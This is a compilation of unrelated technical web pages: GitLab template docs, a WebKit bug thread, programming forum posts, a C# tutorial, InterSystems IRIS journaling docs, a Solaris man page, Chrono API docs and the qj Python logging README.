- Edit the following files to include the project template. Two types of built-in templates are available within GitLab:

Normal templates: Available in GitLab Free and above (this is the most common type of built-in template). See MR !25318 for an example. To add a normal template:

Open lib/gitlab/project_template.rb and add details of the template in the localized_templates_table method.
In the following example, the short name of the project is hugo:

ProjectTemplate.new('hugo', 'Pages/Hugo', _('Everything you need to create a GitLab Pages site using Hugo'), ' 'illustrations/logos/hugo.svg'),

If the vendored project doesn't have an SVG icon, omit , 'illustrations/logos/hugo.svg'.

- Open spec/lib/gitlab/project_template_spec.rb and add the short name of the template in the .all test.
- Open app/assets/javascripts/projects/default_project_templates.js and add details of the template. For example:

hugo: {
  text: s__('ProjectTemplates|Pages/Hugo'),
  icon: '.template-option .icon-hugo',
},

If the vendored project doesn't have an SVG icon, use .icon-gitlab_logo instead.

Enterprise templates: Introduced in GitLab 12.10, that are available only in GitLab Premium and above. See MR !28187 for an example. To add an Enterprise template:

Open ee/lib/ee/gitlab/project_template.rb and add details of the template in the localized_ee_templates_table method. For example:

::Gitlab::ProjectTemplate.new('hipaa_audit_protocol', 'HIPAA Audit Protocol', _('A project containing issues for each audit inquiry in the HIPAA Audit Protocol published by the U.S. Department of Health & Human Services'), ' 'illustrations/logos/asklepian.svg')

- Open ee/spec/lib/gitlab/project_template_spec.rb and add the short name of the template in the .all test.
- Open ee/app/assets/javascripts/projects/default_project_templates.js and add details of the template. For example:

hipaa_audit_protocol: {
  text: s__('ProjectTemplates|HIPAA Audit Protocol'),
  icon: '.template-option .icon-hipaa_audit_protocol',
},

Run the vendor_template script. Make sure to pass the correct arguments:

scripts/vendor_template <git_repo_url> <name> <comment>

Regenerate gitlab.pot:

bin/rake gettext:regenerate

- By now, there should be one new file under vendor/project_templates/ and 4 changed files. Commit all of them in a new branch and create a merge request.
Test with GDK

If you are using the GitLab Development Kit (GDK) you must disable praefect and regenerate the Procfile, as the Rake task is not currently compatible with it:

# gitlab-development-kit/gdk.yml
praefect:
  enabled: false

- Follow the steps described in the vendoring process.
- Run the following Rake task where <path>/<name> is the name you gave the template in lib/gitlab/project_template.rb:

bin/rake gitlab:update_project_templates[<path>/<name>]

You can now test to create a new project by importing the new template in GDK.

Contribute an improvement to an existing template

Existing templates are imported from the following groups:

To contribute a change, open a merge request in the relevant project and mention @gitlab-org/manage/import/backend when you are ready for a review. Then, if your merge request gets accepted, either open an issue to ask for it to get updated, or open a merge request updating the vendored template.
https://docs.gitlab.com/ee/development/project_templates.html
Escape sequences aren't working correctly with @-rule names like @namespace or @import.

Created attachment 44117 [details]
Patch

style-queue ran check-webkit-style on attachment 44117 [details] without any errors.

Comment on attachment 44117 [details]
Patch

> +void CSSParser::recheckAtKeyword(const UChar* str, int len)
> +{
> +    String ruleName(str, len);

This String construction should not be necessary. We should instead add a version of equalIgnoringCase() that takes a UChar* and a length instead of a String. This will avoid the allocation.

Given that this is a really silly edge case that will never ever get hit in the real world, I'm not too concerned about making a single String.

Fixed in r51600.

*** Bug 21471 has been marked as a duplicate of this bug. ***
https://bugs.webkit.org/show_bug.cgi?id=32045
I am having a weird issue with subprocess.Popen as invoked from my LaTeXTools plugin. A user reported the following bug: a LaTeX file containing a picture originally in eps format fails to compile when building from ST2, but builds just fine when invoking the exact same command that the plugin uses from the command line. What's special (sort of) about this file is that the LaTeX graphics package, upon encountering the eps file, is smart enough to invoke the epstopdf command from within tex, and then import the resulting pdf file. This is what fails under ST2. I can confirm that running the appropriate latex build command from the command line works just fine. In fact, I wrote a python script that invokes the exact same command used by the LaTeXTools plugin, using subprocess.Popen---again, this is copied line by line from the plugin. The results: if I run the script from the command line, everything works. If I run the script from within the ST2 console, I have exactly the same behavior that I observe when I build from ST2. I reproduce the script below for convenience. What is going on? Is there some limitation on processes run from ST2 that in turn spawn other processes? Note that TeXshop has no trouble at all with eps file conversion on the fly. Here's the script. Again, this is *not* the plugin code: just a standalone test script. The actual plugin code gets the file name from the current view, etc. Also note that the path is set so tex and friends (including epstopdf) are reachable. Also, I tested this on OS X; I haven't tried it on Windows. The problem exists up to the current release, 2134. 
import sys, os, os.path
import subprocess

make_cmd = ["latexmk", "-e", "$pdflatex = q/pdflatex %O -synctex=1 %S/", "-f", "-pdf"]

file_name = os.path.normpath("/Users/xxxxx/Documents/temp/sublimeTests/epstest/epstest.tex")
tex_dir = os.path.dirname(file_name)

cmd = make_cmd + [file_name]
print cmd

path = "$PATH:/usr/texbin"
old_path = os.environ["PATH"]
os.environ["PATH"] = os.path.expandvars(path).encode(sys.getfilesystemencoding())

os.chdir(tex_dir)

proc = subprocess.Popen(cmd)
proc.wait()

os.environ["PATH"] = old_path
print proc.returncode
http://www.sublimetext.com/forum/viewtopic.php?f=3&t=3459
Automorphic Number Program in C# with Examples

In this article, I am going to discuss How to Implement the Automorphic Number Program in C# with Examples. Please read our previous article where we discussed the Happy Number Program in C#. Here, in this article, first, we will learn what an Automorphic Number is, and then we will see how to implement the Automorphic Number Program in C#. And finally, we will see how to print all the Automorphic numbers between a range of numbers, like between 1 to 100 or 100 to 1000, etc.

What is an Automorphic Number?

A number is said to be an Automorphic number if the square of the number ends with the number itself.

Example: 5 is an automorphic number
Explanation: 5 * 5 = 25 // ends with 5, which is the original number

Example: 7 is not an automorphic number
Explanation: 7 * 7 = 49 // doesn't end with the number 7

How to implement the Automorphic Number Program in C#?

We are going to use a very basic method to implement this program, but before that, you should have some basic knowledge of the following operators:

- Modulus (%) Operator
- Divide (/) Operator

If you are unfamiliar with or not confident about these, have a look at our previous articles where we discussed them in great detail, like Duck Number, Disarium Number, Buzz Number, and Strong Number.

Solution

Step 1: Take a number from the user.

Step 2: Find the square of the number by just multiplying it with the number itself, and store this in a variable named square.

Step 3: Extract the last digit of both numbers (the squared number and the given number) using the modulus (%) operator.

Example: Given number: 25. Square number: 625

25 % 10 = 5    625 % 10 = 5
2 % 10 = 2     62 % 10 = 2
0 % 10 = 0     6 % 10 = 6

This process will continue until the given number becomes 0.

Step 4: Compare the extracted digits of both numbers.
If it is not equal then immediately break the loop and print “Not Automorphic Number” otherwise repeat the process until the remainder =0 of the given number. Then simply Print the Automorphic Number. Note: If the loop will continue till the end which means all the digits of the number are present in the squared number. Example: Automorphic Number Program in C# The following sample code shows how to implement the Automorphic number program in C#. using System; public class AutomorphicProgram { public static void Main () { Console.Write ("Enter a number : "); int number = Convert.ToInt32 (Console.ReadLine ()); if (CheckAutomorphicNumber (number)) { Console.WriteLine ("Automorphic Number"); } else { Console.WriteLine ("Not Automorphic Number"); } Console.ReadLine (); } public static bool CheckAutomorphicNumber (int no) { int square = no * no; while (no > 0) { if (no % 10 != square % 10) { return false; } no = no / 10; square = square / 10; } return true; } } Output C# Program to Print all Automorphic Numbers Between 1 and N The following C# Program will allow the user to input a number. Then it will print all the Automorphic numbers between 1 and that input number. using System; public class AutomorphicProgram { public static void Main () { //Take input from end-user Console.WriteLine ("Enter an integer number:"); int number = Convert.ToInt32(Console.ReadLine ()); Console.WriteLine("Automorphic Numbers Between 1 and " + number + " : "); for (int i = 1; i <= number; i++) { if (CheckAutomorphicNumber(i)) { Console.Write (i + " "); } } Console.ReadLine (); } public static bool CheckAutomorphicNumber(int no) { int square = no * no; while (no > 0) { if(no % 10 != square % 10) { return false; } no = no / 10; square = square / 10; } return true; } } Output Here, in this article, I try to explain How to Implement the Automorphic Number Program in C# with Examples and I hope you enjoy this Automorphic Number Program in C# article.
https://dotnettutorials.net/lesson/automorphic-number-in-csharp/
Hi, I want to use methods specific to the OS, but when I try to do so, I am only able to find out the OS name; the code never goes inside the matching branch. I wrote a simple piece of code as below:

public class OSnane {
    public static void main(String[] args) {
        String OsName = null;
        OsName = System.getProperty("os.name");
        System.out.println("OS name=" + OsName);
        if (OsName == "SunOS")
            System.out.println("hello Sun");
        else if (OsName == "Windows XP")
            System.out.println("Hello Windows");
        else if (OsName == "Linux")
            System.out.println("Hello Linux");
        else
            System.out.println("No OS selected!!!");
    }
}

and the output is:

OS name=SunOS
No OS selected!!!

So how can I use the method based on the OS?

Thanks in advance....
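The root cause here is a standard Java pitfall: == compares object references, not string contents, and System.getProperty("os.name") returns a String object that is not the same reference as the literals in the if statements. Strings must be compared with equals() (or startsWith() for prefix matches). A minimal sketch of the fix — the class and method names below are my own, not from the original post:

```java
public class OsGreeter {
    // Pick a greeting based on the OS name string.
    // Use equals()/startsWith(), never == : the == operator compares
    // references, so it is almost always false for a freshly obtained
    // system property compared against a string literal.
    public static String greet(String osName) {
        if (osName.equals("SunOS")) {
            return "hello Sun";
        } else if (osName.startsWith("Windows")) { // covers "Windows XP", "Windows 7", ...
            return "Hello Windows";
        } else if (osName.equals("Linux")) {
            return "Hello Linux";
        } else {
            return "No OS selected!!!";
        }
    }

    public static void main(String[] args) {
        String osName = System.getProperty("os.name");
        System.out.println("OS name=" + osName);
        System.out.println(greet(osName));
    }
}
```

With equals() in place, the SunOS machine from the post would take the first branch instead of falling through to the else.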
http://forums.devx.com/printthread.php?t=172386&pp=15&page=1
Write Image Journaling and Recovery

InterSystems IRIS® uses write image journaling to maintain the internal integrity of your InterSystems IRIS database. It is the foundation of the database recovery process.

Write Image Journaling

InterSystems IRIS safeguards database updates by using a two-phase technique, write image journaling, in which updates are first written from memory to a transitional journal, IRIS.WIJ, and then to the database. If the system crashes during the second phase, the updates can be reapplied upon recovery. The following topics are covered in greater detail below.

Write Image Journal (WIJ) File

The Write daemon is activated at InterSystems IRIS startup and creates the write image journal (WIJ) file. The Write daemon records database updates in the WIJ before writing them to the InterSystems IRIS database. By default, the WIJ file is named IRIS.WIJ and resides in the system manager directory, usually install-dir/Mgr, where install-dir is the installation directory. To specify a different location for this file or the file’s target size, use the Management Portal:

- Navigate to the Journal Settings page of the Management Portal (System Administration > Configuration > System Configuration > Journal Settings).
- Enter the new location of the WIJ in the Write image journal directory box and click Save. The name must identify an existing directory on the system and may be up to 63 characters long. If you edit this setting for a clustered instance, restart InterSystems IRIS to apply the change; no restart is necessary for a standalone instance.
- Enter the target size for the WIJ at the Target size for the wij (MB) (0=not set) prompt. The default of zero allows the WIJ to grow as needed but does not reserve space for this; entering a non-zero value reserves the specified space on the storage device.
For information about the two settings described, which are included in the instance’s iris.cpf file, see targwijsz and wijdir in the [config] section of the Configuration Parameter File Reference.

Two-Phase Write Protocol

InterSystems IRIS maintains application data in databases whose structure enables fast, efficient searches and updates. Generally, when an application updates data, InterSystems IRIS must modify a number of blocks in the database structure to reflect the change. Due to the sequential nature of disk access, any sudden, unexpected interruption of disk or computer operation can halt the update of multiple database blocks after the first block has been written but before the last block has been updated. Without protection, such an incomplete update could leave the database structure inconsistent; the consequences could be as severe as a totally unusable database, with all data irretrievable by normal means.

The InterSystems write image journaling technology uses a two-phase process of writing to the database to protect against such events, as follows:

- In the first phase, InterSystems IRIS records the updated blocks in the WIJ. Once it enters all updates to the WIJ, it sets a flag in the file and the second phase begins.
- In the second phase, the Write daemon writes the same set of blocks recorded in the WIJ to the database on disk. When this second phase completes, the Write daemon sets a flag in the WIJ to indicate that it is deleted.

When InterSystems IRIS starts, it automatically checks the WIJ and runs a recovery procedure if it detects that an abnormal shutdown occurred. When the procedure completes successfully, the internal integrity of the database is restored. InterSystems IRIS also runs WIJ recovery following a shutdown as a safety precaution, to ensure that the database can be safely backed up.

Recovery

WIJ recovery is necessary if a system crash or other major system malfunction occurs.
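The two-phase protocol and the recovery decision it enables can be sketched as a toy model. This is purely conceptual Java with invented names, not how InterSystems IRIS is actually implemented; it only illustrates why a completed first phase makes an interrupted second phase recoverable:

```java
import java.util.HashMap;
import java.util.Map;

/** Toy model of a two-phase write: updates are staged in a
 *  WIJ-like journal first, then applied to the "database".
 *  On restart, an interrupted second phase is detected via the
 *  flag and replayed from the journal. */
class TwoPhaseStore {
    final Map<String, String> database = new HashMap<>();
    final Map<String, String> wij = new HashMap<>();
    boolean wijComplete = false; // set once phase one finishes

    // Phase one: record all updated blocks in the journal, then flag it.
    void stage(Map<String, String> updates) {
        wij.putAll(updates);
        wijComplete = true;
    }

    // Phase two: write the same blocks to the database, then mark
    // the journal contents as "deleted" by clearing the flag.
    void commit() {
        database.putAll(wij);
        wij.clear();
        wijComplete = false;
    }

    // Startup recovery: if the flag is still set, the crash happened
    // during phase two, so the journaled blocks are reapplied.
    void recover() {
        if (wijComplete) {
            commit();
        }
    }
}
```

The key property the sketch shows: once phase one has durably recorded every block, replaying the journal is always safe, because rewriting the same blocks is idempotent.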
When InterSystems IRIS starts, it automatically checks the WIJ. If it detects that an abnormal shutdown occurred, it runs a recovery procedure. Depending on where the WIJ is in the two-phase write protocol process, recovery does the following:

- If the crash occurred after the last update to the WIJ was completed but before completion of the corresponding update to the databases — that is, during the second phase of the process — the WIJ is restored as described in WIJ Restore.
- If the crash occurred after the last WIJ update was durably written to the databases — that is, after both phases were completed — a block comparison is done between the most recent WIJ updates and the affected databases, as described in WIJ Block Comparison (Windows and UNIX®/Linux only).

WIJ Restore

If the WIJ is marked as “active,” the Write daemon completed writing modified disk blocks to the WIJ but had not completed writing the blocks back to their respective databases. This indicates that WIJ restoration is needed. The recovery program, iriswdimj, does the following:

- Informs the system manager in the messages log (messages.log) file; see Monitoring Log Files in the “Monitoring InterSystems IRIS Using the Management Portal” chapter of the Monitoring Guide.
- Performs Dataset Recovery.

Typically, all recovery is performed in a single run of the iriswdimj program.

Dataset Recovery

A dataset is a specific database directory on a specific InterSystems IRIS system. The iriswdimj program restores all datasets configured in the InterSystems IRIS instance being restarted after an abnormal shutdown. The iriswdimj program can run interactively or non-interactively, depending on the platform, as follows:

- Windows — always runs non-interactively.
- UNIX®/Linux — runs non-interactively until encountering an error, then runs interactively if an operator is present to respond to prompts. When the iris start quietly command is used on UNIX®/Linux systems, it always runs non-interactively.
When the recovery procedure is complete, iriswdimj marks the contents of the WIJ as “deleted” and startup continues. If an error occurred during writing, the WIJ remains active and InterSystems IRIS will not start; recovery is repeated the next time InterSystems IRIS starts unless you override this option (in interactive mode). If you override the option to restore the WIJ, databases may become corrupted or lose data. The following topics are discussed in more detail below.

Interactive Dataset Recovery

The recovery procedure allows you to confirm the recovery on a dataset-by-dataset basis. Normally, you specify all datasets. After each dataset prompt, type either:

Y — to restore that dataset
N — to reject restoration of that dataset

You can also specify a new location for the dataset if the path to it has been lost but you can still access the dataset. Once a dataset has been recovered, it is removed from the list of datasets requiring recovery; furthermore, it is not recovered during subsequent runs of the iriswdimj program, should any be necessary.

Noninteractive Dataset Recovery

When the recovery procedure runs noninteractively, InterSystems IRIS attempts to restore all datasets and mark the WIJ as deleted. On UNIX® and Windows platforms, InterSystems IRIS first attempts a fast parallel restore of all datasets; in the event of one or more errors during the fast restore, datasets are restored one at a time so that the databases that were fully recovered can be identified. If at least one dataset cannot be restored:

- The iriswdimj program aborts and the system is not started.
- Any datasets that were not successfully recovered are still marked as requiring recovery in the WIJ.

WIJ Block Comparison

Typically, a running InterSystems IRIS instance is actively writing to databases only a small fraction of the time.
In most crashes, therefore, the blocks last written to the WIJ were confirmed to have been durably written to the databases before the crash; the WIJ is not marked "active", and there is no WIJ restore to be performed. When InterSystems IRIS starts up after such a crash, however, the blocks in the most recent WIJ updates are compared to the corresponding blocks in the affected databases as a form of rapid integrity check, to guard against starting the instance in an uncertain state after a crash that was accompanied by a storage subsystem failure. The comparison runs for a short time to avoid impacting availability, and asynchronous I/O is used to maximize throughput. If all blocks match, or no mismatch is detected within 10 seconds, startup continues normally. If a mismatch is found within this time, the results are as follows:

- The comparison operation continues until all available WIJ blocks have been compared.
- The mismatching WIJ blocks are written to a file called MISMATCH.WIJ in the WIJ directory.
- Normal startup is aborted and InterSystems IRIS starts in single-user mode with a message like the following:

There exists a MISMATCH.WIJ file. Startup aborted, entering single user mode.
Enter IRIS with 'iris terminal [instancename] -B' and 'D ^STURECOV' for help recovering from this error.

This situation calls for immediate attention. Use the information that follows to determine the appropriate course of action. When your recovery procedures are complete, you must rename the MISMATCH.WIJ file, either using the STURECOV routine or externally, before InterSystems IRIS startup can continue; the file is persistent and prevents normal startup of the instance.

Run the indicated command to perform an emergency login as system administrator (see Administrator Terminal Session in the “Licensing” chapter of the System Administration Guide). You are now in the manager’s namespace and can run the startup recovery routine with the command Do ^STURECOV.
The following WIJ mismatch recovery message and menu appear on a UNIX®/Linux system:

... rename the MISMATCH.WIJ. Otherwise, MISMATCH.WIJ probably
contains blocks that were lost due to a disk problem. You can view
those blocks and apply them if necessary. When finished, rename the
MISMATCH.WIJ in order to continue startup.

1) List Affected Databases and View Blocks
2) Apply mismatched blocks from WIJ to databases
3) Rename MISMATCH.WIJ
4) Dismount a database
5) Mount a database
6) Database Repair Utility
7) Check Database Integrity
8) Bring up the system in multi-user mode
9) Display instructions on how to shut down the system
--------------------------------------------------------------
H) Display Help
E) Exit this utility
--------------------------------------------------------------

On a Windows system, options 8 and 9 are replaced by 8) Bring down the system prior to a normal startup.

Option 3) Rename MISMATCH.WIJ renames the file by appending the date; if there is already a renamed MISMATCH.WIJ with that name, a number (such as _1) is appended.

The appropriate actions in the event of a WIJ mismatch differ based on the needs and policies of your enterprise, and are largely the same as your site's existing practices for responding to events that imply data integrity problems. Considerations include tolerance for risk, criticality of the affected databases, uptime requirements, and suspected root cause. The following are some considerations and recommendations specific to the WIJ block comparison process:

Replacing, restoring, or making any changes to the databases or WIJ files after a crash and before recovery can lead to discrepancies that are then found during WIJ comparison and recorded in the MISMATCH.WIJ file.
If this has occurred, rename MISMATCH.WIJ.

Note: If a database is to be restored following a crash, ensure that prior to the restore you start the instance without WIJ and journal recovery (see Starting InterSystems IRIS Without Automatic WIJ and Journal Recovery in the “Backup and Restore” chapter of this guide). This avoids both creating discrepancies that will be detected by the WIJ comparison and incorrectly applying WIJ blocks or journal data (see the “Journaling” chapter of this guide) to a version of a database for which they were not intended.

Some storage subsystems, particularly local drives on laptops and workstations, use an unsafe form of write-back caching that is not backed by battery or by non-volatile memory. This defeats the two-phase write protocol that InterSystems IRIS performs and can lead to corruption following a hardware crash or power loss that is detected during WIJ compare. If this applies to your system, it is likely that MISMATCH.WIJ contains more up-to-date data and therefore can be safely applied to the databases (assuming the system is one with which an abundance of caution is not required). If you have made any changes to the databases following the WIJ comparison, MISMATCH.WIJ is no longer valid and it is not safe to apply the WIJ blocks.

For servers with enterprise-class storage, or any storage subsystem that does not use an unsafe form of write-back caching, mismatches found during WIJ compare are always unexpected and warrant careful attention, as they may be a sign of a more serious or more widespread problem. Depending on the root cause of the problem, it may be that the databases are intact and it is the WIJ that is corrupted. An integrity check of the affected databases can help determine whether this is likely.
Because WIJ comparison only covers the blocks written most recently, there may be problems affecting additional blocks that could be detected by a full integrity check (see Verifying Structural Integrity in the “Introduction to Data Integrity” chapter of this guide). If the databases are small and/or time allows, you can follow a procedure similar to the following for optimal safety:

- Run a full integrity check on the databases. If none are corrupt, rename MISMATCH.WIJ and start up.
- If one or more databases are corrupt, copy the IRIS.DAT files for all databases, apply all blocks from MISMATCH.WIJ, and run a full integrity check again.
- If any database is corrupt after applying MISMATCH.WIJ, the databases can be reverted to the previous copy or restored from a previous backup.

Encrypted databases are excluded from the WIJ block comparison. If you are uncertain about how to proceed when WIJ mismatches are detected, contact the InterSystems Worldwide Response Center (WRC).

Limitations of Write Image Journaling

While the two-phase write protocol safeguards structural database integrity, it does not prevent data loss. If the system failure occurs prior to a complete write of an update to the WIJ, InterSystems IRIS does not have all the information it needs to perform a complete update to disk, and therefore that data is lost. However, data that has been written to a journal file is recovered as described in Recovery in this chapter.

In addition, write image journaling cannot eliminate database degradation in the following cases:

- A hardware malfunction that corrupts memory or storage.
- An operating system malfunction that corrupts memory, the filesystem, or storage.
- The WIJ is deleted.
- The loss of write-back cache contents. In the event of a power outage, the write-back cache could be lost, leading to database degradation.
To prevent this degradation, ensure that either the storage array uses nonvolatile memory for its write-back cache, or the volatile write-back cache has battery backup. If you believe that one of these situations has occurred, contact the InterSystems Worldwide Response Center (WRC).
https://docs.intersystems.com/healthconnectlatest/csp/docbook/DocBook.UI.Page.cls?KEY=GCDI_WIJ
#include <sys/conf.h>
#include <sys/ddi.h>
#include <sys/sunddi.h>

void disksort(struct diskhd *dp, struct buf *bp);

INTERFACE LEVEL
Solaris DDI specific (Solaris DDI).

PARAMETERS
dp — A pointer to a diskhd structure. A diskhd structure is essentially identical to the head of a buffer structure (see buf(9S)). The only defined items of interest for this structure are the av_forw and av_back structure elements, which are used to maintain the front and tail pointers of the forward-linked I/O request queue.

bp — A pointer to a buffer structure. Typically this is the I/O request that the driver receives in its strategy routine (see strategy(9E)). The driver is responsible for initializing the b_resid structure element to a meaningful sort key value prior to calling disksort().

DESCRIPTION
The disksort() function sorts a pointer to a buffer into a single forward-linked list headed by the av_forw element of the argument *dp. It uses a one-way elevator algorithm that sorts buffers into the queue in ascending order based upon a key value held in the buffer structure element b_resid. This value can be either the driver-calculated cylinder number for the I/O request described by the buffer argument, or simply the absolute logical block of the I/O request, depending on how fine-grained the sort should be or how applicable either quantity is to the device in question. The head of the linked list is found by use of the av_forw structure element of the argument *dp. The tail of the linked list is found by use of the av_back structure element of the argument *dp. The av_forw element of the *bp argument is used by disksort() to maintain the forward linkage. The value at the head of the list presumably indicates the currently active disk area.

CONTEXT
This function can be called from user, interrupt, or kernel context.

SEE ALSO
strategy(9E), buf(9S), Writing Device Drivers

NOTES
The disksort() function does no locking. Therefore, any locking is completely the responsibility of the caller.
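The ascending-order insertion that disksort() performs can be sketched in simplified form. This is a conceptual model only: it uses a Java list in place of the kernel's av_forw/av_back linkage, and it omits the wrap-around handling that a real one-way elevator applies to keys that fall behind the currently active head position. The class and names are invented for illustration:

```java
import java.util.ArrayList;
import java.util.List;

/** Simplified model of disksort(): keep pending I/O requests
 *  sorted in ascending order of their sort key (the role played
 *  by b_resid in the real driver interface). */
class DiskQueue {
    // Stands in for the forward-linked av_forw chain.
    final List<Integer> keys = new ArrayList<>();

    /** Insert a request key, preserving ascending order. */
    void disksort(int key) {
        int i = 0;
        // Walk forward until we pass the insertion point.
        while (i < keys.size() && keys.get(i) <= key) {
            i++;
        }
        keys.add(i, key);
    }
}
```

Sorting by cylinder or logical block this way means the head services requests in one sweep across the disk, rather than seeking back and forth in arrival order.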
http://backdrift.org/man/SunOS-5.10/man9f/disksort.9f.html
Description

Class for defining a clutch or a brake (1D model) between two one-degree-of-freedom parts; i.e., shafts that can be used to build 1D models of powertrains.

#include <ChShaftsClutch.h>

Member Function Documentation

Method to allow deserialization of transient data from archives. Reimplemented from chrono::ChShaftsCouple.

Use this function after clutch creation, to initialize it, given the two shafts to join.

Set the user modulation of the torque (or brake, if you use it between a fixed shaft and a free shaft). The modulation must range from 0 (switched off) to 1 (max torque). The default is 1 when the clutch is created. You can update this during the integration loop to simulate the pedal being pushed by the driver.

Set the transmissible torque limit (the maximum torque that the clutch can transmit between the two shafts). You can specify two values for the backward/forward directions: usually these are equal (e.g., -100, 100) in most commercial clutches, but if you specify (0, 100), for instance, you can create a so-called freewheel or overrunning clutch that works only in one direction.

Set the transmissible torque limit (the maximum torque that the clutch can transmit between the two shafts) for both the forward and backward directions.
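The interplay between the torque limits and the modulation described above can be illustrated with a toy numeric model: the torque actually transmitted is the requested torque clamped to the backward/forward limits, both scaled by the 0..1 modulation. This is not the Chrono API — it is a hypothetical sketch of the behavior the documentation describes, with invented names:

```java
/** Toy model of a clutch torque limit with user modulation.
 *  limitBackward/limitForward mirror the asymmetric limits
 *  described in the docs (e.g. -100, 100 for a symmetric clutch,
 *  or 0, 100 for a freewheel/overrunning clutch). */
class ClutchModel {
    double limitBackward;        // e.g. -100 (must be <= 0 for this sketch)
    double limitForward;         // e.g. +100
    double modulation = 1.0;     // 0 = disengaged, 1 = full torque

    ClutchModel(double backward, double forward) {
        this.limitBackward = backward;
        this.limitForward = forward;
    }

    /** Torque actually transmitted for a requested torque:
     *  clamped to the modulated backward/forward limits. */
    double transmittedTorque(double requested) {
        double lo = limitBackward * modulation;
        double hi = limitForward * modulation;
        return Math.max(lo, Math.min(hi, requested));
    }
}
```

With limits (0, 100) the model transmits no torque at all in the backward direction, which is exactly the freewheel behavior the documentation mentions.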
http://api.projectchrono.org/classchrono_1_1_ch_shafts_clutch.html
qj: logging designed for debugging

Project description

qj: logging designed for debugging (pronounced ‘queuedj’ /kjuːʤ/)

An easy-to-use but very expressive logging function. If you have ever found yourself rewriting a list comprehension as a for loop, or splitting a line of code into three lines just to store and log an intermediate value, then this log function is for you.

Overview:

qj is meant to help debug python quickly with lightweight log messages that are easy to add and remove. On top of the basic logging functionality, qj also provides a collection of debugging helpers that are simple to use, including the ability to drop into the python debugger in the middle of a line of code.

Examples:

Instead of turning this:

result = some_function(another_function(my_value))

into this:

tmp = another_function(my_value)
logging.info('tmp = %r', tmp)
result = some_function(tmp)

you can just do this:

result = some_function(qj(another_function(my_value)))

Instead of turning this:

my_list = [process_value(value) for value in some_function(various, other, args) if some_condition(value)]

into this:

my_list = []
for value in some_function(various, other, args):
    logging.info('value = %r', value)
    condition = some_condition(value)
    logging.info('condition = %r', condition)
    if condition:
        final_value = process_value(value)
        logging.info('final_value = %r', final_value)
        my_list.append(final_value)
logging.info('my_list = %r', my_list)

you can keep it as the list comprehension:

my_list = qj([qj(process_value(qj(value)))
              for value in some_function(various, other, args)
              if qj(some_condition(value))])

Philosophy:

There are two reasons we add logs to our code:

- We want to communicate something to the user of the code.
- We want to debug.

In python, as well as most other languages, the default logging mechanisms serve the first purpose well, but make things unnecessarily difficult for the second purpose. Debug logging should have no friction.
When you have a question about your code, you should not be tempted to just think hard to try to come up with the answer. Instead, you should know that you can type just a few characters to see the answer. You should never have to rewrite code just to check it for bugs.

The most important feature of a debug logger is that it always returns its argument. This allows you to add logging calls pretty much anywhere in your code without having to rewrite your code or create temporary variables. This is a minimal implementation of qj:

def qj(x):
    print(x)
    return x

Once you have that core property, there are a lot of other useful things you find yourself wanting that make debugging easier. qj attempts to cleanly pull debugging-related features together into a very simple power-user interface. To that end, most argument names are single letters that are mnemonics for the particular feature:

x is for the input that you want to log and return.
s is for the string you want to describe x.
d is for the debugger.
b is for the boolean that turns everything off.
l is for the lambda that lets you log more things.
p is for printing public properties of x.
n is for numpy array statistics.
t is for printing tensorflow Tensors.
r is for overriding the return value.
z is for zeroing out the log count and automatic indentation of a particular log.

A few less-commonly needed features get longer names:

pad is for padding a log message so that it stands out.
tfc is for checking numerics on tensorflow Tensors.
tic and toc are for measuring and logging timing of arbitrary chunks of code.
time is for measuring and logging timing stats for a callable.
catch is for catching exceptions from a callable.
log_all_calls is for wrapping x such that all public method calls and their return values get logged.

The right description of x is usually its source code.
If you want to log the value of a variable named long_variable_name, you shouldn't need to think about how to describe the variable in the log message so you can find it. Its name and the line number where you are logging it are its best description. qj(long_variable_name) logs something like this:

qj: <some_file> some_func: long_variable_name <line_number>: <value of long_variable_name>

Similarly, logging the value of a complicated expression should use the expression itself as the description. qj(foo * 2 + bar ** 2) logs something like:

qj: <some_file> some_func: foo * 2 + bar ** 2 <line_number>: 42

You shouldn't need to import just to log debug messages. Ideally, something like qj would be available as a builtin in python. We can get pretty close to that ideal by providing a way to install qj into the global namespace after importing it the first time. This means that you can pretend qj is a builtin and use it in any python code that runs after you import it once, even if the original import is in some other file, package, or library.

Adding logs should be easy. So should removing logs. The name qj is meant to be easy to type (two characters typed with opposite hands) and easy to search for and highlight in your code. 'qj' is one of the least frequently occurring bigrams based on a survey of millions of lines of python code, so it is hopefully very unlikely to occur naturally in your code. This property will help you find and remove all of your debug logs easily once you have fixed your bugs.

Logs should be easy to read. qj defaults to using colors. The metadata and description of the log are in red. The value of the log is in green. Your debug logs will stand out strongly against whatever normal logging your code does. qj also works to align log messages nicely, where possible, to help you visually group related log messages together.
Basic Usage:

Install with pip:

$ pip install qj

Add the following import:

from qj_global import qj

This makes qj globally available in any python code that is run after the import. It's often nice to import qj from your main script once, since you can then use it in your entire project (and even in other python libraries). See Global Access for more information on importing.

If your problem code looks like this:

def problem_code(...):
    ...
    problem_array = [other_func(value, other_args)
                     for value in compute_some_array(more_args)
                     if some_tricky_condition]

Make it look like this:

def problem_code(...):
    ...
    problem_array = qj([qj(other_func(qj(value), qj(other_args)))
                        for value in qj(compute_some_array(qj(more_args)))
                        if qj(some_tricky_condition)])

In most cases, you shouldn't need to put logs on everything like that, of course. If your debug cycle is fast, you can add the logs more selectively to avoid getting overwhelmed by new logspam.

These changes will result in detailed logs that tell you what function they are running in, what line number they are on, what the source code for the log is, and what its value is. The log messages will also be indented some amount that corresponds to how many calls to qj are in the current code context. This is particularly useful with comprehensions, since python reports the last line of the comprehension in logs and stack traces, which is often not the correct line when dealing with long comprehensions (or even long argument lists).
This is the general layout of the basic log message:

[datetime] qj: <file> function: [indentation] source code or description <line>: value

In the example above, the log messages might look like:

qj: <some_file> problem_code: more_args <92>: ['list', 'of', 'more_args']
qj: <some_file> problem_code: compute_some_array(qj(more_args)) <92>: ['list', 'of', 'things', 'hey!']
qj: <some_file> problem_code: some_tricky_condition <92>: True
qj: <some_file> problem_code: other_args <92>: ['list', 'of', 'other_args']
qj: <some_file> problem_code: value <92>: list
qj: <some_file> problem_code: other_func(qj(value), qj(other_args)) <92>: other_func_return list
qj: <some_file> problem_code: some_tricky_condition <92>: True
qj: <some_file> problem_code: other_args <92>: ['list', 'of', 'other_args']
qj: <some_file> problem_code: value <92>: of
qj: <some_file> problem_code: other_func(qj(value), qj(other_args)) <92>: other_func_return of
qj: <some_file> problem_code: some_tricky_condition <92>: False
qj: <some_file> problem_code: some_tricky_condition <92>: True
qj: <some_file> problem_code: other_args <92>: ['list', 'of', 'other_args']
qj: <some_file> problem_code: value <92>: hey!
qj: <some_file> problem_code: other_func(qj(value), qj(other_args)) <92>: other_func_return hey!
